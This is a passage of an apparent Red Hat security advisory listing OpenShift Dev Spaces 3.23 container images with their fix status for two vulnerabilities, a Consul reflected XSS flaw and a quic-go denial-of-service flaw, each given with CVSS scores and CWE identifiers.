Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Low

CVE-2024-10006

A flaw was found in HashiCorp Consul and Consul Enterprise. The server response does not explicitly set a Content-Type HTTP header, allowing user-provided inputs to be misinterpreted and can lead to reflected cross-site scripting (XSS).

8.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

CWE-644 - Improper Neutralization of HTTP Headers for Scripting Syntax

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Vendor Fix fix Workaround

Known not affected 50 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Important

CVE-2024-22189

A flaw was found in quic-go. This issue may allow an attacker to trigger a denial of service by sending a large number of NEW_CONNECTION_ID frames that retire old connection IDs. The receiver is supposed to respond to each retirement frame with a RETIRE_CONNECTION_ID frame, but the attacker can prevent the receiver from sending out the vast majority of these RETIRE_CONNECTION_ID frames by selectively acknowledging received packets and collapsing the peers congestion window and by manipulating the peer's RTT estimate.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Vendor Fix fix

Known not affected 50 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64		—
